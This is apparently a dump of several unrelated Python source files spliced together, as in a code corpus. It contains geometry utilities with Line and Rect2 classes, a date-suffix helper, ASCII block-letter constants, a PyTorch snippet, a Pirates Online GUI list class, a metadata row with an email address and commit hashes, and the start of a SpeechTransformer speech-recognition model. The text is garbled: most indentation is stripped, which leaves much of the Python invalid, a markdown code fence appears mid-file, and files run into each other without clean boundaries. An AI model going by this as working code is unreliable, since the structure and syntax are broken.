return (amplitude * (sin(period * (degrees + phase_shift)))) + vertical_shift
def get_terminal_columns():
return shutil.get_terminal_size().columns
def is_imported(module_name):
return module_name in sys.modules
def distance(start, end):
return ((start[0] - end[0]) ** 2 + (start[1] - end[1]) ** 2) ** 0.5
def dot_product(a, b):
    return (a[0] * b[0]) + (a[1] * b[1])
def reduce(lst, p, how="left"):
if not isinstance(how, str):
how = str(how)
how = how.lower()
if how not in ["left", "center", "right", "distributed"]:
how = "distributed"
l = len(lst)
n_items = round(l * p)
if n_items <= 0:
return []
if how == "left":
return lst[:n_items]
elif how == "center":
a = (l - n_items) // 2
b = (l + n_items) // 2
if l % 2 == 1:
b += 1
return lst[a:b]
elif how == "right":
return lst[l - n_items:]
else:
return lst[0: l: l // n_items]
class Line:
def __init__(self, x1, y1, x2, y2):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.is_init = False
self.tupl = None
self.p1 = None
self.p2 = None
self.m = None
self.b = None
self.abc = None
self.init(x1, y1, x2, y2)
def init(self, x1, y1, x2, y2):
self.tupl = ((x1, y1), (x2, y2))
self.p1 = x1, y1
self.p2 = x2, y2
div = x2 - x1
if div != 0:
self.m = (y2 - y1) / div
else:
self.m = "undefined"
if self.m != "undefined":
self.b = y1 - (x1 * self.m)
else:
self.b = "undefined"
self.abc = (y2 - y1, x1 - x2, ((y2 - y1) * x1) + ((x1 - x2) * y1))
self.is_init = True
def collide_point(self, x, y, is_segment=True):
        if self.m == "undefined" or self.b == "undefined":
            # Vertical line: x must match; for a segment, y must also lie within it.
            if self.x1 != x:
                return False
            return (not is_segment) or min(self.y1, self.y2) <= y <= max(self.y1, self.y2)
if not is_segment:
return y == (self.m * x) + self.b
return y == (self.m * x) + self.b and (self.x1 <= x <= self.x2 or self.x2 <= x <= self.x1) and (
self.y1 <= y <= self.y2 or self.y2 <= y <= self.y1)
def collide_line(self, line):
assert isinstance(line, Line)
a1, b1, c1 = self.abc
a2, b2, c2 = line.abc
det = a1 * b2 - a2 * b1
if det == 0:
# Lines are parallel
return None
else:
x = (b2 * c1 - b1 * c2) / det
y = (a1 * c2 - a2 * c1) / det
            # collide_point already bounds the point to each segment (in either
            # orientation), so no extra order-sensitive range checks are needed.
            if self.collide_point(x, y) and line.collide_point(x, y):
                return x, y
            else:
                return None
def __eq__(self, other):
return isinstance(other, Line) and (all([
self.x1 == other.x1,
self.y1 == other.y1,
self.x2 == other.x2,
self.y2 == other.y2
]) or all([
self.x1 == other.x2,
self.y1 == other.y2,
self.x2 == other.x1,
self.y2 == other.y1
]))
    # comparison object "other" must be a tuple / list of:
    # (x, y, flag) -> if y_at_x(x) is None (vertical line), x is compared against x_at_y(y) instead
    # (x, y) -> None comparisons throw TypeErrors
def __lt__(self, other):
if isinstance(other, tuple) or isinstance(other, list):
if len(other) == 2:
if all([isinstance(x, int) or isinstance(x, float) for x in other]):
ox, oy = other
return oy < self.y_at_x(ox)
elif len(other) == 3:
if all([isinstance(x, int) or isinstance(x, float) for x in other[:2]]):
if isinstance(other[2], bool) or (isinstance(other[2], int) and other[2] in [0, 1]):
ox, oy, none_result = other
v = self.y_at_x(ox)
# return (oy < v) if v is not None else bool(none_result)
return (oy < v) if v is not None else (ox < self.x_at_y(oy))
        raise TypeError(
            "Cannot compare \"{}\" of type \"{}\" with Line.\nRequires tuple / list: (x, y)".format(other, type(other)))
    # comparison object "other" must be a tuple / list of:
    # (x, y, flag) -> if y_at_x(x) is None (vertical line), x is compared against x_at_y(y) instead
    # (x, y) -> None comparisons throw TypeErrors
def __le__(self, other):
if isinstance(other, tuple) or isinstance(other, list):
if len(other) == 2:
if all([isinstance(x, int) or isinstance(x, float) for x in other]):
ox, oy = other
return oy <= self.y_at_x(ox)
elif len(other) == 3:
if all([isinstance(x, int) or isinstance(x, float) for x in other[:2]]):
if isinstance(other[2], bool) or (isinstance(other[2], int) and other[2] in [0, 1]):
ox, oy, none_result = other
v = self.y_at_x(ox)
# return (oy <= v) if v is not None else bool(none_result)
return (oy <= v) if v is not None else (ox <= self.x_at_y(oy))
        raise TypeError(
            "Cannot compare \"{}\" of type \"{}\" with Line.\nRequires tuple / list: (x, y)".format(other, type(other)))
    # comparison object "other" must be a tuple / list of:
    # (x, y, flag) -> if y_at_x(x) is None (vertical line), x is compared against x_at_y(y) instead
    # (x, y) -> None comparisons throw TypeErrors
def __gt__(self, other):
if isinstance(other, tuple) or isinstance(other, list):
if len(other) == 2:
if all([isinstance(x, int) or isinstance(x, float) for x in other]):
ox, oy = other
return oy > self.y_at_x(ox)
elif len(other) == 3:
if all([isinstance(x, int) or isinstance(x, float) for x in other[:2]]):
if isinstance(other[2], bool) or (isinstance(other[2], int) and other[2] in [0, 1]):
ox, oy, none_result = other
v = self.y_at_x(ox)
# return (oy > v) if v is not None else bool(none_result)
return (oy > v) if v is not None else (ox > self.x_at_y(oy))
        raise TypeError(
            "Cannot compare \"{}\" of type \"{}\" with Line.\nRequires tuple / list: (x, y)".format(other, type(other)))
    # comparison object "other" must be a tuple / list of:
    # (x, y, flag) -> if y_at_x(x) is None (vertical line), x is compared against x_at_y(y) instead
    # (x, y) -> None comparisons throw TypeErrors
def __ge__(self, other):
if isinstance(other, tuple) or isinstance(other, list):
if len(other) == 2:
if all([isinstance(x, int) or isinstance(x, float) for x in other]):
ox, oy = other
return oy >= self.y_at_x(ox)
elif len(other) == 3:
if all([isinstance(x, int) or isinstance(x, float) for x in other[:2]]):
if isinstance(other[2], bool) or (isinstance(other[2], int) and other[2] in [0, 1]):
ox, oy, none_result = other
v = self.y_at_x(ox)
# return (oy >= v) if v is not None else bool(none_result)
return (oy >= v) if v is not None else (ox >= self.x_at_y(oy))
        raise TypeError(
            "Cannot compare \"{}\" of type \"{}\" with Line.\nRequires tuple / list: (x, y)".format(other, type(other)))
def y_at_x(self, x):
        if self.m == "undefined":
            return None
if self.m == 0:
return self.y1
return (self.m * x) + self.b
def x_at_y(self, y):
if self.m == "undefined":
return self.x1
if self.m == 0:
return None
return (y - self.b) / self.m
def translate(self, x, y):
self.x1 += x
self.x2 += x
self.y1 += y
self.y2 += y
self.init(self.x1, self.y1, self.x2, self.y2)
def translated(self, x, y):
r = Line(self.x1, self.y1, self.x2, self.y2)
r.translate(x, y)
return r
def __iter__(self):
lst = [self.p1, self.p2]
for val in lst:
yield val
def __repr__(self):
if self.m == "undefined":
return "x = {}".format(self.x1)
if self.m == 0:
return "y = {}".format(self.b)
return "y = {}x + {}".format("%.2f" % self.m, self.b)
# class Rect:
# def __init__(self, x, y=None, w=None, h=None):
# self.x = x
# self.y = y
# self.width = w
# self.height = h
# if any([y is None, w is None, h is None]):
# if is_imported("pygame"):
# if isinstance(x, pygame.Rect):
# x = x.left
# y = x.y
# w = x.width
# y = x.height
# else:
# raise ValueError("Cannot create a Rect object with <{}>.\nExpected a pygame.Rect object.".format(x))
# else:
# ValueError("Cannot create a rect object with <{}>.\npygame module is not imported.".format(x))
# self.is_init = False
# self.tupl = None
# self.top = None
# self.left = None
# self.bottom = None
# self.right = None
# self.center = None
# self.top_left = None
# self.top_right = None
# self.bottom_left = None
# self.bottom_right = None
# self.top_line = None
# self.left_line = None
# self.right_line = None
# self.bottom_line = None
# self.center_top = None
# self.center_left = None
# self.center_right = None
# self.center_bottom = None
# self.area = None
# self.perimetre = None
# self.init(x, y, w, h)
#
# def init(self, x, y, w, h):
# self.x = x
# self.y = y
# self.width = w
# self.height = h
# self.tupl = (x, y, w, h)
# self.top = y
# self.left = x
# self.bottom = y + h
# self.right = x + w
# self.center = x + (w / 2), y + (h / 2)
# self.top_left = x, y
# self.top_right = x + w, y
# self.bottom_left = x, y + h
# self.bottom_right = x + w, y + h
# self.center_top = self.center[0], y
# self.center_left = x, self.center[1]
# self.center_right = x + w, self.center[1]
# self.center_bottom = self.center[0], y + h
# self.area = w * h
# self.perimetre = 2 * (w + h)
# self.top_line = Line(*self.top_left, *self.top_right)
# self.left_line = Line(*self.top_left, *self.bottom_left)
# self.right_line = Line(*self.top_right, *self.bottom_right)
# self.bottom_line = Line(*self.bottom_left, *self.bottom_right)
# self.is_init = True
#
# def __iter__(self):
# lst = [self.x, self. y, self.width, self.height]
# for val in lst:
# yield val
#
# def collide_rect(self, rect, strictly_inside=True):
# if strictly_inside:
# return all([
# self.left < rect.left,
# self.right > rect.right,
# self.top < rect.top,
# self.bottom > rect.bottom
# ])
# else:
# return any([
# self.collide_point(*rect.top_left),
# self.collide_point(*rect.top_right),
# self.collide_point(*rect.bottom_left),
# self.collide_point(*rect.bottom_right)
# ])
#
# def collide_line(self, line):
# assert isinstance(line, Line)
# if self.collide_point(*line.p1) or self.collide_point(*line.p1):
# return True
# else:
# top = Line(self.left, self.top, self.right, self.top)
# bottom = Line(self.left, self.bottom, self.right, self.bottom)
# left = Line(self.left, self.top, self.left, self.bottom)
# right = Line(self.right, self.top, self.right, self.bottom)
# return any([
# line.collide_line(top),
# line.collide_line(bottom),
# line.collide_line(left),
# line.collide_line(right)
# ])
#
# def collide_point(self, x, y):
# return all([
# self.x <= x <= self.right,
# self.y <= y <= self.bottom
# ])
#
# def translate(self, x, y):
# if not self.is_init:
# self.init(self.x, self.y, self.width, self.height)
# self.x += x
# self.y += y
# self.init(self.x, self.y, self.width, self.height)
#
# def translated(self, x, y):
# r = Rect(self.x, self.y, self.width, self.height)
# r.translate(x, y)
# return r
#
# def scale(self, w_factor, h_factor):
# self.init(self.x, self.y, self.width * w_factor, self.height * h_factor)
#
# def scaled(self, w_factor, h_factor):
# r = Rect(self.x, self.y, self.width, self.height)
# r.scale(w_factor, h_factor)
# return r
#
# def move(self, rect):
# self.init(rect.x, rect.y, rect.width, rect.height)
#
# def resize(self, rect):
# self.init(rect.x, rect.y, rect.width, rect.height)
#
# def __repr__(self):
# return "<rect(" + ", ".join(list(map(str, [self.x, self.y, self.width, self.height]))) + ")>"
# x2,y2 x1,y1 ---- x2,y2
# x1,y1 / | | |
# | x3,y3 x4,y4 ---- x3,y3
# x4,y4 /
class Rect2:
def __init__(self, x, y=None, w=None, h=None, a=0):
self.x = None
self.y = None
self.w = None
self.h = None
self.width = None
self.height = None
self.angle = None
self.x1, self.y1 = None, None
self.x2, self.y2 = None, None
self.x3, self.y3 = None, None
self.x4, self.y4 = None, None
self.p1 = None
self.p2 = None
self.p3 = None
self.p4 = None
self.l1 = None
self.l2 = None
self.l3 = None
self.l4 = None
self.a = a % 360
self.angle = a % 360
self.tupl = None
self.max_encapsulating_rect = None
self.min_encapsulating_rect = None
self.top = None
self.left = None
self.bottom = None
self.right = None
self.center = None
self.top_left = None
self.top_right = None
self.bottom_left = None
self.bottom_right = None
self.center_top = None
self.center_left = None
self.center_right = None
self.center_bottom = None
self.area = None
self.perimeter = None
self.top_line = None
self.right_line = None
self.bottom_line = None
self.left_line = None
self.diagonal_p1_p3 = None
self.diagonal_p3_p1 = None
self.diagonal_p2_p4 = None
self.diagonal_p4_p2 = None
self.init(x, y, w, h, a)
def init(self, x, y, w, h, a):
if w < 0:
raise ValueError("width value: \"{}\" must not be less than 0.".format(w))
if h < 0:
raise ValueError("height value: \"{}\" must not be less than 0.".format(h))
self.x = x
self.y = y
self.w = w
self.h = h
self.width = w
self.height = h
self.angle = a
self.x1, self.y1 = x, y
self.x2, self.y2 = rotate_point(x, y, x + w, y, a)
self.x3, self.y3 = rotate_point(x, y, x + w, y + h, a)
self.x4, self.y4 = rotate_point(x, y, x, y + h, a)
self.p1 = self.x1, self.y1
self.p2 = self.x2, self.y2
self.p3 = self.x3, self.y3
self.p4 = self.x4, self.y4
self.l1 = Line(self.x1, self.y1, self.x2, self.y2)
self.l2 = Line(self.x2, self.y2, self.x3, self.y3)
self.l3 = Line(self.x3, self.y3, self.x4, self.y4)
self.l4 = Line(self.x4, self.y4, self.x1, self.y1)
self.top_line = self.l1
self.right_line = self.l2
self.bottom_line = self.l3
self.left_line = self.l4
# self.tupl = (self.p1, self.p2, self.p3, self.p4)
self.tupl = (self.x, self.y, self.w, self.h)
if a == 0:
self.max_encapsulating_rect = self
self.min_encapsulating_rect = self
else:
xs = [self.x1, self.x2, self.x3, self.x4]
ys = [self.y1, self.y2, self.y3, self.y4]
xs.sort()
ys.sort()
self.max_encapsulating_rect = Rect2(xs[0], ys[0], xs[3] - xs[0], ys[3] - ys[0], 0)
self.min_encapsulating_rect = Rect2(xs[1], ys[1], xs[2] - xs[1], ys[2] - ys[1], 0)
# Using max_encapsulating_rect for calculations
self.top = self.max_encapsulating_rect.y
self.left = self.max_encapsulating_rect.x
self.bottom = self.max_encapsulating_rect.y + self.max_encapsulating_rect.height
self.right = self.max_encapsulating_rect.x + self.max_encapsulating_rect.width
self.center = self.left + (self.max_encapsulating_rect.width / 2), self.top + (
self.max_encapsulating_rect.height / 2)
self.top_left = self.left, self.top
self.top_right = self.right, self.top
self.bottom_left = self.left, self.bottom
        self.bottom_right = self.right, self.bottom
self.center_top = self.center[0], self.top
self.center_left = self.left, self.center[1]
self.center_right = self.right, self.center[1]
self.center_bottom = self.center[0], self.bottom
self.diagonal_p1_p3 = Line(*self.p1, *self.p3)
        self.diagonal_p3_p1 = Line(*self.p3, *self.p1)
self.diagonal_p2_p4 = Line(*self.p2, *self.p4)
self.diagonal_p4_p2 = Line(*self.p4, *self.p2)
# Calculations done on the main rect object
self.area = w * h
self.perimeter = 2 * (w + h)
def __iter__(self):
lst = [self.x, self.y, self.width, self.height, self.angle]
for val in lst:
yield val
def collide_point(self, x, y, strictly_inside=False):
if not all([
any([
isinstance(x, int),
isinstance(x, float)
]),
any([
isinstance(y, int),
isinstance(y, float)
])
]):
raise TypeError(
"Cannot determine if x=\"{}\" of type: \"{}\" y=\"{}\" of type: \"{}\" collides with Rect object. Requires int and / or float objects.".format(
x, type(x), y, type(y)))
if strictly_inside:
return all([
(x, y, 1) < self.l1,
(x, y, 1) > self.l2,
(x, y, 1) > self.l3,
(x, y, 1) < self.l4
])
else:
return all([
(x, y, 1) <= self.l1,
(x, y, 1) >= self.l2,
(x, y, 1) >= self.l3,
(x, y, 1) <= self.l4
])
def collide_line(self, line, strictly_inside=False):
if not isinstance(line, Line):
raise TypeError(
"Cannot determine if line=\"{}\" of type: \"{}\" collides with Rect object. Requires Line object.".format(
line, type(line)))
if strictly_inside:
return all([
self.collide_point(*line.p1),
self.collide_point(*line.p2)
])
else:
return any([
self.collide_point(*line.p1),
self.collide_point(*line.p2)
])
def collide_rect(self, rect, strictly_inside=False):
if not isinstance(rect, Rect2):
raise TypeError(
"Cannot determine if rect=\"{}\" of type: \"{}\" collides with Rect object. Requires Rect object.".format(
rect, type(rect)))
if strictly_inside:
return all([
self.collide_point(*rect.p1),
self.collide_point(*rect.p2),
self.collide_point(*rect.p3),
self.collide_point(*rect.p4)
])
else:
return any([
self.collide_point(*rect.p1),
self.collide_point(*rect.p2),
self.collide_point(*rect.p3),
self.collide_point(*rect.p4)
])
def translate(self, x, y):
self.init(self.x + x, self.y + y, self.width, self.height, self.angle)
def translated(self, x, y):
return Rect2(self.x + x, self.y + y, self.width, self.height, self.angle)
def scale(self, w, h):
w = abs(w)
h = abs(h)
self.init(self.x, self.y, self.width * w, self.height * h, self.angle)
def scaled(self, x, y):
r = Rect2(*self)
r.scale(x, y)
return r
def rotate(self, a):
self.init(self.x, self.y, self.width, self.height, self.angle + a)
def rotated(self, a):
r = Rect2(*self)
r.rotate(a)
return r
def __repr__(self):
return "<rect(p1:({}), p2:({}), p3:({}), p4:({}))>".format(self.p1, self.p2, self.p3, self.p4)
def date_suffix(day):
s_day = str(day)
if s_day[-1] == "1":
res = "st"
if len(s_day) > 1:
if s_day[-2] == "1":
res = "th"
elif s_day[-1] == "2":
res = "nd"
if len(s_day) > 1:
if s_day[-2] == "1":
res = "th"
elif s_day[-1] == "3":
res = "rd"
if len(s_day) > 1:
if s_day[-2] == "1":
res = "th"
else:
res = "th"
return res
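# An equivalent compact form of the suffix rules above (hypothetical helper,
# handling the 11/12/13 special cases with one modulo check):

```python
def ordinal_suffix(day):
    # 11th, 12th, 13th are exceptions; otherwise the last digit decides.
    if 10 <= day % 100 <= 13:
        return "th"
    return {1: "st", 2: "nd", 3: "rd"}.get(day % 10, "th")

print([str(d) + ordinal_suffix(d) for d in (1, 2, 3, 11, 21)])
# -> ['1st', '2nd', '3rd', '11th', '21st']
```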
# Takes "2021-08-03" -> "August 3rd, 2021"
def date_str_format(date_str):
date_obj = dt.datetime.fromisoformat(date_str)
suffix = date_suffix(date_obj.day)
res = dt.datetime.strftime(date_obj, "%B %d###, %Y").replace("###", suffix)
s_res = res.split(" ")
x = s_res[1] if s_res[1][0] != "0" else s_res[1][1:]
res = " ".join([s_res[0], x, s_res[2]])
return res
# Appends a counter '(1)' to a given file path to avoid overwriting.
def next_available_file_name(path):
counter = 0
    path = path.replace("\\", "/")
og_path = path
while os.path.exists(path):
counter += 1
spl = og_path.split(".")
path = ".".join(spl[:-1]) + " ({}).".format(counter) + spl[-1]
    path = path.replace("/", "\\")
return path
BLK_ONE = "1", " 1 \n 1 \n 1 \n 1 \n 1 "
BLK_TWO = "2", "22222\n 2\n22222\n2 \n22222"
BLK_THREE = "3", "33333\n 3\n 333\n 3\n33333"
BLK_FOUR = "4", " 4\n4 4\n44444\n 4\n 4"
BLK_FIVE = "5", "55555\n5 \n55555\n 5\n55555"
BLK_SIX = "6", "66666\n6 \n66666\n6 6\n66666"
BLK_SEVEN = "7", "77777\n 7\n 7\n 7\n 7"
BLK_EIGHT = "8", "88888\n8 8\n88888\n8 8\n88888"
BLK_NINE = "9", "99999\n9 9\n99999\n 9\n 9"
BLK_ZERO = "0", "00000\n00 0\n0 0 0\n0 00\n00000"
BLK_A = "A", " A \n A A \nAA AA\nAAAAA\nA A"
BLK_B = "B", "BBBB \nB BB\nBBBB \nB B\nBBBBB"
BLK_C = "C", " CCCC\nC \nC \nC \n CCCC"
BLK_D = "D", "DDDD \nD D\nD D\nD D\nDDDD "
BLK_E = "E", "EEEEE\nE \nEEE \nE \nEEEEE"
BLK_F = "F", "FFFFF\nF \nFFF \nF \nF "
BLK_G = "G", "GGGGG\nG \nG GG\nG G\nGGGGG"
BLK_H = "H", "H H\nH H\nHHHHH\nH H\nH H"
BLK_I = "I", "IIIII\n I \n I \n I \nIIIII"
BLK_J = "J", "JJJJJ\n J \n J \nJ J \nJJJ "
BLK_K = "K", "K K\nK K \nKKK \nK K \nK K"
BLK_L = "L", "L \nL \nL \nL \nLLLLL"
BLK_M = "M", " M M \nMMMMM\nM M M\nM M M\nM M M"
BLK_N = "N", "N N\nNN N\nN N N\nN NN\nN N"
BLK_O = "O", " OOO \nO O\nO O\nO O\n OOO "
BLK_P = "P", "PPPP \nP P\nPPPP \nP \nP "
BLK_Q = "Q", " QQQ \nQ Q\nQ Q\nQ QQ\n QQQQ"
BLK_R = "R", "RRRR \nR R\nRRRR \nR R \nR R"
BLK_S = "S", " SSS \nS \n SSS \n S\n SSS "
BLK_T = "T", "TTTTT\n T \n T \n T \n T "
BLK_U = "U", "U U\nU U\nU U\nU U\n UUU "
BLK_V = "V", "V V\nV V\nV V\n V V \n V "
BLK_W = "W", "W W W\nW W W\nW W W\nWWWWW\n W W "
BLK_X = "X", "X X\n X X \n X \n X X \nX X"
BLK_Y = "Y", "Y Y\n Y Y \n Y \n Y \n Y "
BLK_Z = "Z", "ZZZZZ\n Z \n Z \n Z \nZZZZZ"
BLK_ADDITION = "+", " \n + \n +++ \n + \n "
BLK_SUBTRACTION = "-", " \n \n --- \n \n "
BLK_MULTIPLICATION = "X", " \n X X \n X \n X X \n "
BLK_DIVISON = "/", " \n / \n / \n / \n "
BLK_PERCENTAGE = "%", "% %\n % \n % \n % \n% %"
# File: pytorch/range_test.py
import torch
import torch.nn as nn
a = torch.range(0,5,requires_grad=True)
loss = torch.sum(a) - 5
loss.backward()
print(a.grad)
# File: PORMain/pirates/piratesgui/ShipItemList.py
# File: S (Python 2.4)
from direct.gui.DirectGui import *
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui import InventoryItemList
from pirates.piratesgui import ShipItemGUI
from pirates.piratesbase import PiratesGlobals
class ShipItemList(InventoryItemList.InventoryItemList):
def __init__(self, inventory, height, trade = 0, buy = 0, sell = 0, use = 0):
InventoryItemList.InventoryItemList.__init__(self, inventory, height, trade, buy, sell, use)
self.initialiseoptions(ShipItemList)
def loadInventoryPanels(self):
for item in self.inventory:
data = [
item,
1]
self.addPanel(data, repack = 0)
self.repackPanels()
def addPanel(self, data, repack = 1):
panel = ShipItemGUI.ShipItemGUI(data, trade = self.trade, buy = self.buy, sell = self.sell, use = self.use)
panel.reparentTo(self.getCanvas())
self.panels.append(panel)
if repack:
self.repackPanels()
def repackPanels(self):
invHeight = len(self.inventory)
z = 0.01 + PiratesGuiGlobals.ShipItemGuiHeight
i = 0
for i in xrange(len(self.panels)):
self.panels[i].setPos(0.01, 0, -z * (i + 1))
self.panels[i].origionalPos = self.panels[i].getPos(render2d)
self['canvasSize'] = (0, PiratesGuiGlobals.ShipItemGuiWidth - 0.089, -z * (i + 1), 0)
| [
"brandoncarden12345@gmail.com"
] | brandoncarden12345@gmail.com |
df2666e3fd97881431c7a61a94434e2a383e53b3 | be707c76437382cbae951611b358bec257db0925 | /models/transformer/model.py | bd096f9871a2bab0b5c6121e9ca22a129275facf | [
"Apache-2.0"
] | permissive | sooftware/End-to-End-Speech-Recognition-Models | 1405738336d76a671df41b3a2f9a72280bda45d3 | 07d590adc91ad660867f49be565a3512347cd50a | refs/heads/main | 2023-02-11T14:39:28.523024 | 2021-01-10T18:57:46 | 2021-01-10T18:57:46 | 316,734,678 | 39 | 4 | Apache-2.0 | 2021-01-05T11:26:43 | 2020-11-28T12:59:44 | Python | UTF-8 | Python | false | false | 12,137 | py | # -*- coding: utf-8 -*-
# Soohwan Kim @ https://github.com/sooftware/
# This source code is licensed under the Apache 2.0 license found in the
# LICENSE file in the root directory of this source tree.
# Reference :
# - **https://github.com/graykode/nlp-tutorial**
# - **https://github.com/dreamgonfly/transformer-pytorch**
# - **https://github.com/jadore801120/attention-is-all-you-need-pytorch**
# - **https://github.com/JayParks/transformer**
import math
import torch
import torch.nn as nn
from torch import Tensor
from typing import (
Optional,
Any,
Tuple,
Union,
)
from models.extractor import (
VGGExtractor,
DeepSpeech2Extractor,
)
from models.modules import (
Linear,
LayerNorm, Transpose,
)
from models.transformer.mask import (
get_attn_pad_mask,
get_decoder_self_attn_mask,
)
from models.transformer.embeddings import (
Embedding,
PositionalEncoding,
)
from models.transformer.layers import (
SpeechTransformerEncoderLayer,
SpeechTransformerDecoderLayer,
)
class SpeechTransformer(nn.Module):
"""
A Speech Transformer model. User is able to modify the attributes as needed.
The model is based on the paper "Attention Is All You Need".
Args:
        num_classes (int): number of classification classes
d_model (int): dimension of model (default: 512)
input_dim (int): dimension of input
pad_id (int): identification of <PAD_token>
eos_id (int): identification of <EOS_token>
d_ff (int): dimension of feed forward network (default: 2048)
num_encoder_layers (int): number of encoder layers (default: 6)
num_decoder_layers (int): number of decoder layers (default: 6)
num_heads (int): number of attention heads (default: 8)
dropout_p (float): dropout probability (default: 0.3)
        ffnet_style (str): if poswise_ffnet is 'ff', the position-wise feed-forward network is a feed-forward
            layer; otherwise, it is a convolution layer. (default: ff)
    Inputs: inputs, input_lengths, targets
- **inputs** (torch.Tensor): tensor of sequences, whose length is the batch size and within which
each sequence is a list of token IDs. This information is forwarded to the encoder.
- **input_lengths** (torch.Tensor): tensor of sequences, whose contains length of inputs.
- **targets** (torch.Tensor): tensor of sequences, whose length is the batch size and within which
each sequence is a list of token IDs. This information is forwarded to the decoder.
Returns: output
- **output**: tensor containing the outputs
"""
def __init__(
self,
            num_classes: int,                       # number of classification classes
d_model: int = 512, # dimension of model
input_dim: int = 80, # dimension of input
pad_id: int = 0, # identification of <PAD_token>
eos_id: int = 2, # identification of <EOS_token>
d_ff: int = 2048, # dimension of feed forward network
num_heads: int = 8, # number of attention heads
num_encoder_layers: int = 6, # number of encoder layers
num_decoder_layers: int = 6, # number of decoder layers
dropout_p: float = 0.3, # dropout probability
ffnet_style: str = 'ff', # feed forward network style 'ff' or 'conv'
extractor: str = 'vgg', # CNN extractor [vgg, ds2]
            joint_ctc_attention: bool = False       # flag indicating whether to apply joint ctc attention
) -> None:
super(SpeechTransformer, self).__init__()
assert d_model % num_heads == 0, "d_model % num_heads should be zero."
self.extractor = extractor
self.joint_ctc_attention = joint_ctc_attention
self.eos_id = eos_id
self.pad_id = pad_id
if self.extractor == 'vgg':
input_dim = (input_dim - 1) << 5 if input_dim % 2 else input_dim << 5
self.conv = VGGExtractor(mask_conv=False)
elif self.extractor == 'ds2':
input_dim = int(math.floor(input_dim + 2 * 20 - 41) / 2 + 1)
input_dim = int(math.floor(input_dim + 2 * 10 - 21) / 2 + 1)
input_dim <<= 6
self.conv = DeepSpeech2Extractor(mask_conv=False)
else:
raise ValueError("Unsupported Extractor : {0}".format(extractor))
self.encoder = SpeechTransformerEncoder(
d_model=d_model,
input_dim=input_dim,
d_ff=d_ff,
num_layers=num_encoder_layers,
num_heads=num_heads,
ffnet_style=ffnet_style,
dropout_p=dropout_p,
pad_id=pad_id,
)
if self.joint_ctc_attention:
self.encoder_fc = nn.Sequential(
nn.BatchNorm1d(d_model),
Transpose(shape=(1, 2)),
nn.Dropout(dropout_p),
Linear(d_model, num_classes, bias=False)
)
self.decoder = SpeechTransformerDecoder(
num_classes=num_classes,
d_model=d_model,
d_ff=d_ff,
num_layers=num_decoder_layers,
num_heads=num_heads,
ffnet_style=ffnet_style,
dropout_p=dropout_p,
pad_id=pad_id,
eos_id=eos_id
)
self.decoder_fc = Linear(d_model, num_classes)
def forward(
self,
inputs: Tensor, # tensor of input sequences
input_lengths: Tensor, # tensor of input sequence lengths
targets: Optional[Tensor] = None, # tensor of target sequences
) -> Union[Tensor, tuple]:
encoder_log_probs = None
conv_feat = self.conv(inputs.unsqueeze(1), input_lengths)
conv_feat = conv_feat.transpose(1, 2)
batch_size, seq_length, num_channels, hidden_dim = conv_feat.size()
conv_feat = conv_feat.contiguous().view(batch_size, seq_length, num_channels * hidden_dim)
if self.extractor == 'vgg':
input_lengths = (input_lengths >> 2).int()
memory = self.encoder(conv_feat, input_lengths)
if self.joint_ctc_attention:
encoder_log_probs = self.encoder_fc(memory.transpose(1, 2)).log_softmax(dim=2)
output = self.decoder(targets, input_lengths, memory)
output = self.decoder_fc(output)
return output, encoder_log_probs, input_lengths
def greedy_search(self, inputs: Tensor, input_lengths: Tensor, device: str):
with torch.no_grad():
logit = self.forward(inputs, input_lengths)[0]
return logit.max(-1)[1]
class SpeechTransformerEncoder(nn.Module):
"""
The TransformerEncoder is composed of a stack of N identical layers.
Each layer has two sub-layers. The first is a multi-head self-attention mechanism,
and the second is a simple, position-wise fully connected feed-forward network.
Args:
d_model: dimension of model (default: 512)
input_dim: dimension of feature vector (default: 80)
d_ff: dimension of feed forward network (default: 2048)
num_layers: number of encoder layers (default: 6)
num_heads: number of attention heads (default: 8)
ffnet_style: style of feed forward network [ff, conv] (default: ff)
dropout_p: probability of dropout (default: 0.3)
pad_id: identification of pad token (default: 0)
Inputs:
        - **inputs**: list of sequences, whose length is the batch size and within which each sequence is a list of tokens
- **input_lengths**: list of sequence lengths
"""
def __init__(
self,
d_model: int = 512, # dimension of model
input_dim: int = 80, # dimension of feature vector
d_ff: int = 2048, # dimension of feed forward network
num_layers: int = 6, # number of encoder layers
num_heads: int = 8, # number of attention heads
ffnet_style: str = 'ff', # style of feed forward network [ff, conv]
dropout_p: float = 0.3, # probability of dropout
pad_id: int = 0, # identification of pad token
) -> None:
super(SpeechTransformerEncoder, self).__init__()
self.d_model = d_model
self.num_layers = num_layers
self.num_heads = num_heads
self.pad_id = pad_id
self.input_proj = Linear(input_dim, d_model)
self.input_norm = LayerNorm(d_model)
self.input_dropout = nn.Dropout(p=dropout_p)
self.positional_encoding = PositionalEncoding(d_model)
self.layers = nn.ModuleList(
[SpeechTransformerEncoderLayer(d_model, num_heads, d_ff, dropout_p, ffnet_style) for _ in range(num_layers)]
)
def forward(self, inputs: Tensor, input_lengths: Tensor = None) -> Tuple[Tensor, list]:
self_attn_mask = get_attn_pad_mask(inputs, input_lengths, inputs.size(1))
output = self.input_dropout(self.input_norm(self.input_proj(inputs)) + self.positional_encoding(inputs.size(1)))
for layer in self.layers:
output, attn = layer(output, self_attn_mask)
return output
class SpeechTransformerDecoder(nn.Module):
"""
The TransformerDecoder is composed of a stack of N identical layers.
Each layer has three sub-layers. The first is a multi-head self-attention mechanism,
    and the second is a multi-head attention mechanism, and the third is a feed-forward network.
Args:
        num_classes: number of classes
d_model: dimension of model
d_ff: dimension of feed forward network
num_layers: number of decoder layers
num_heads: number of attention heads
ffnet_style: style of feed forward network
dropout_p: probability of dropout
pad_id: identification of pad token
eos_id: identification of end of sentence token
"""
def __init__(
self,
num_classes: int, # number of classes
d_model: int = 512, # dimension of model
d_ff: int = 512, # dimension of feed forward network
num_layers: int = 6, # number of decoder layers
num_heads: int = 8, # number of attention heads
ffnet_style: str = 'ff', # style of feed forward network
dropout_p: float = 0.3, # probability of dropout
pad_id: int = 0, # identification of pad token
eos_id: int = 2 # identification of end of sentence token
) -> None:
super(SpeechTransformerDecoder, self).__init__()
self.d_model = d_model
self.num_layers = num_layers
self.num_heads = num_heads
self.embedding = Embedding(num_classes, pad_id, d_model)
self.positional_encoding = PositionalEncoding(d_model)
self.input_dropout = nn.Dropout(p=dropout_p)
self.layers = nn.ModuleList([
SpeechTransformerDecoderLayer(d_model, num_heads, d_ff, dropout_p, ffnet_style) for _ in range(num_layers)
])
self.pad_id = pad_id
self.eos_id = eos_id
